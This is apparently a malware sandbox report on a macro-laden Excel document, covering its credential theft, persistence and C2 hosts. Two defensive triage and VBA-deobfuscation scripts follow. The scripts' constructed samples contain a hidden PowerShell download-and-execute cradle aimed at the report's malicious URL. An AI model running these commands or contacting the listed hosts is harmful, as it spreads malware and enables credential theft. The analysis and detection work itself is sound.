VTI Score | 100 / 100
VTI Database Version | 2.6
VTI Rule Match Count | 31
VTI Rule Type | Documents
Category | Rule | Details
Anti Analysis | Try to detect debugger | Check via API "IsDebuggerPresent".
Browser | Read data related to browsing history | Read the browsing history for "Microsoft Internet Explorer".
Browser | Read data related to saved browser credentials | Read saved credentials for "Google Chrome".
Device | Monitor keyboard input | Read the current state of key "VK_CANCEL" via API.
Information Stealing | Read browser data | Possibly trying to read out browser credentials.
Injection | Write into memory of a process running from a created or modified executable | "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" modifies memory of "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" (source and target run from the same image).
Injection | Modify control flow of a process running from a created or modified executable | "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" alters context of "c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe" (source and target run from the same image).
Network | Download data | URL "65.99.230.27".
Network | Download data | URL "185.82.23.28".
Network | Download data | URL "kerineal.com/simplyelegant/hQoBm/".
Network | Perform DNS request | Resolve host name "kerineal.com".
Network | Connect to remote host | Outgoing TCP connection to host "184.168.152.148:80".
Network | Connect to HTTP server | Remote address "65.99.230.27".
Network | Connect to HTTP server | Remote address "185.82.23.28".
Network | Connect to HTTP server | Remote address "kerineal.com/simplyelegant/hQoBm/".
PE | Execute dropped PE file | Execute dropped file "c:\users\atveydl98z\appdata\local\temp\38763.exe".
PE | Drop PE file | Drop file "c:\users\atveydl98z\appdata\local\temp\38763.exe".
Persistence | Install system startup script or application | Add "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" (value data includes the surrounding quotes) to Windows startup via registry.
Process | Create process | Create process "powershell -e …" (the base64 body of the encoded command is not preserved in this extract).
Process | Create process | Create process "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe".
Process | Create process | Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe".
Process | Create process | Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp".
Process | Create process | Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp".
Process | Create process | Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp".
Process | Create system object | Create mutex with name "Global\.net clr networking".
Process | Create system object | Create mutex with name "MF6003E70".
Process | Create system object | Create mutex with name "Global\I40F77A1B".
Process | Create system object | Create mutex with name "Global\M40F77A1B".
Process | Create system object | Create mutex with name "M68B1B0D0".
VBA Macro | Execute application | VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0
VBA Macro | Execute macro on specific worksheet event | Execute macro on "Activate Workbook" event.
Categories with no rule matches: OS, File System, Hide Tracks, Kernel, Masquerade, User, YARA.
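The findings above translate directly into host and network triage checks. The script below is an added example, not part of the sandbox report or of any vendor tooling. It decodes a PowerShell -e / -EncodedCommand argument (base64 of UTF-16LE, which is how the "powershell -e" process in the report would have carried its script), and matches events against the report's indicators: execution of the dropped 38763.exe and viewcom.exe, the /scomma CSV-export switch on viewcom.exe, a process writing into another process launched from the same image, the startup registry entry, the contact hosts and URL path, and the mutex naming pattern. Assumptions, all labelled in the code: the Sysmon-like event dictionaries and their field names, the Run/RunOnce key for the startup entry (the report only says "via registry"), the generalisation of the report's mutex names to "[IM] + 8 hex digits", and the constructed sample events, including the invented encoded PowerShell body. "/scomma <file>" is the CSV-export switch of NirSoft's command-line recovery utilities, which fits the saved-credential reads recorded above; the report does not identify the tool, so the check only keys on the switch.

```python
"""Triage checks derived from the report's VTI findings (added example).

Runs over constructed Sysmon-style event dicts; the event shape, the Run key
location and the mutex pattern are assumptions, the indicator values are the
report's own.
"""
import base64
import binascii
import re

# Indicator values copied from the report.
DROPPED_NAMES = {"38763.exe", "viewcom.exe"}
PERSIST_IMAGE = r"c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe"
C2_HOSTS = {"65.99.230.27", "185.82.23.28", "184.168.152.148", "kerineal.com"}
C2_URL_PATH = "/simplyelegant/hQoBm/"
# Assumed generalisation of Global\I40F77A1B, Global\M40F77A1B, M68B1B0D0, MF6003E70.
MUTEX_RE = re.compile(r"^(?:Global\\)?[IM][0-9A-F]{8}$")
# The report says "windows startup via registry" without naming the key; Run/RunOnce assumed.
RUN_KEY_RE = re.compile(r"\\microsoft\\windows\\currentversion\\run(?:once)?\\", re.I)
# NirSoft-style CSV export switch seen on viewcom.exe in the report.
SCOMMA_RE = re.compile(r"\s/scomma\s", re.I)
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the base64 argument.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
PROCESS_VM_WRITE = 0x0020  # access right needed for WriteProcessMemory


def decode_encoded_command(cmdline):
    """Return the script behind -e/-EncodedCommand (base64 of UTF-16LE), else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # flag present but body is not a valid encoded command


def classify(event):
    """Return the sorted list of report categories one event matches."""
    tags = set()
    kind = event["type"]
    if kind == "process":
        image = event["image"].lower()
        cmd = event["cmdline"]
        if decode_encoded_command(cmd) is not None:
            tags.add("process:encoded-powershell")
        if image.rsplit("\\", 1)[-1] in DROPPED_NAMES:
            tags.add("pe:execute-dropped")
        if SCOMMA_RE.search(cmd):
            tags.add("stealing:scomma-export")
        if event.get("parent", "").lower() == image:
            tags.add("process:same-image-child")
    elif kind == "access":  # cross-process handle with write rights, same image both sides
        same = event["source"].lower() == event["target"].lower()
        if same and event["granted"] & PROCESS_VM_WRITE:
            tags.add("injection:self-write")
    elif kind == "registry":
        if RUN_KEY_RE.search(event["key"]) and PERSIST_IMAGE in event["data"].lower():
            tags.add("persistence:run-key")
    elif kind == "network":
        if event["host"].lower() in C2_HOSTS or event.get("path", "").startswith(C2_URL_PATH):
            tags.add("network:c2-indicator")
    elif kind == "mutex":
        if MUTEX_RE.match(event["name"]):
            tags.add("process:mutex-pattern")
    return sorted(tags)


def triage(events):
    """Return {tag: [event indexes]} over a sequence of events."""
    hits = {}
    for i, ev in enumerate(events):
        for tag in classify(ev):
            hits.setdefault(tag, []).append(i)
    return hits


# Constructed sample events (not real telemetry); the PowerShell body is invented.
SAMPLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://kerineal.com/simplyelegant/hQoBm/')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CMD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "cmdline": "powershell -e " + SAMPLE_ENCODED},
    {"type": "process", "image": r"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"},
    {"type": "process", "image": PERSIST_IMAGE, "parent": PERSIST_IMAGE,
     "cmdline": '"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe" /scomma "C:\\ProgramData\\9F1B.tmp"'},
    {"type": "access", "source": PERSIST_IMAGE, "target": PERSIST_IMAGE, "granted": 0x1FFFFF},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\viewcom",
     "data": '"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe"'},
    {"type": "network", "host": "184.168.152.148", "port": 80, "path": "/"},
    {"type": "network", "host": "kerineal.com", "port": 80, "path": "/simplyelegant/hQoBm/"},
    {"type": "mutex", "name": r"Global\I40F77A1B"},
    {"type": "mutex", "name": r"Global\.net clr networking"},  # benign CLR mutex, should not match
]

if __name__ == "__main__":
    for tag, idx in sorted(triage(SAMPLE_EVENTS).items()):
        print("%-28s events %s" % (tag, idx))
    print("decoded:", decode_encoded_command(SAMPLE_EVENTS[0]["cmdline"]))
```

The encoded-command decoder is the piece worth reusing on real telemetry: the report's own "powershell -e" body was not preserved here, but on a live host the same base64 argument sits in the process command line and decodes the same way. The mutex and Run-key checks are deliberately narrow to this report's values; widen them only after confirming the pattern holds across more samples.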
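The Shell$ call recorded under VBA Macro passes a command assembled from twelve string variables, with window style 0 (vbHide), so the command line never appears as a single literal in the macro body and a string scan of the document finds nothing. The macro's actual variable assignments are not on this page. The script below is an added example, not the report's or the sample's code: it statically resolves such a concatenation (string literals, Chr() calls, + and & operators, and variables assigned elsewhere) and reports the command and window style of every Shell call. The macro it runs on is constructed for illustration, reusing the report's variable names and Workbook_Activate event but with invented assigned values and an invented resulting command.

```python
"""Static resolver for concatenated VBA Shell arguments (added example)."""
import re

# Tokens of a VBA string expression: "literal" (with "" as an escaped quote),
# Chr(n) or Chr$(n), an identifier, or a concatenation operator (+ or &).
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|Chr\$?\((\d+)\)|([A-Za-z_]\w*)|([+&])', re.I)
ASSIGN_RE = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SHELL_RE = re.compile(r'(?:^|\W)Shell\$?\s+(.+?)\s*,\s*(\d+)\s*$', re.I)


def collect_assignments(src):
    """Map each variable name to the expression text last assigned to it."""
    assigns = {}
    for line in src.splitlines():
        line = line.strip()
        if not line or line.startswith("'") or line.lower().startswith(("dim ", "set ")):
            continue
        m = ASSIGN_RE.match(line)
        if m:
            assigns[m.group(1)] = m.group(2)
    return assigns


def evaluate(expr, assigns, depth=0):
    """Concatenate literals, Chr() values and (recursively) variable values."""
    if depth > 32:
        raise ValueError("assignment chain too deep, possible cycle")
    parts = []
    for m in TOKEN_RE.finditer(expr):
        if m.lastindex == 1:
            parts.append(m.group(1).replace('""', '"'))
        elif m.lastindex == 2:
            parts.append(chr(int(m.group(2))))
        elif m.lastindex == 3:
            name = m.group(3)
            if name not in assigns:
                raise KeyError("unresolved variable %r" % name)
            parts.append(evaluate(assigns[name], assigns, depth + 1))
        # lastindex == 4 is a + or & operator and contributes nothing
    return "".join(parts)


def resolve_shell_calls(src):
    """Return [(command_line, window_style)] for every Shell / Shell$ call in src."""
    assigns = collect_assignments(src)
    calls = []
    for line in src.splitlines():
        m = SHELL_RE.search(line.strip())
        if m:
            calls.append((evaluate(m.group(1), assigns), int(m.group(2))))
    return calls


# Constructed macro: the report's variable names and event, invented values.
SAMPLE_MACRO = r'''
Private Sub Workbook_Activate()
    Dim bktLAfLdCk As String, gxNUmgtWxGM As String
    bktLAfLdCk = "po" & Chr(119)
    gxNUmgtWxGM = "ers" + "hell"
    NTmebYUL = " -w"
    aRwMduN = " hid" & "den"
    xpZSkkRz = " -e" & "p byp"
    ZvStsRF = "ass "
    PWwDgrB = "-c " & Chr(34)
    bDPRdLpa = "IEX(New-Object Net.WebClient)"
    bNWzAbXfdBp = ".Download" & "String("
    PHuvNFLBmA = "'http://kerineal.com"
    zWtcLfDZ = "/simplyelegant/hQoBm/')"
    umLbPFhprKh = Chr(34)
    VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0
End Sub
'''

if __name__ == "__main__":
    for cmd, style in resolve_shell_calls(SAMPLE_MACRO):
        print("window style %d (0 = vbHide): %s" % (style, cmd))
```

Window style 0 is vbHide, so the launched process gets no visible window. Real macros add string reversal, arithmetic on character codes or runtime-built variable names on top of plain concatenation; each of those needs its own token rule, and an unresolved name raises rather than silently producing a partial command.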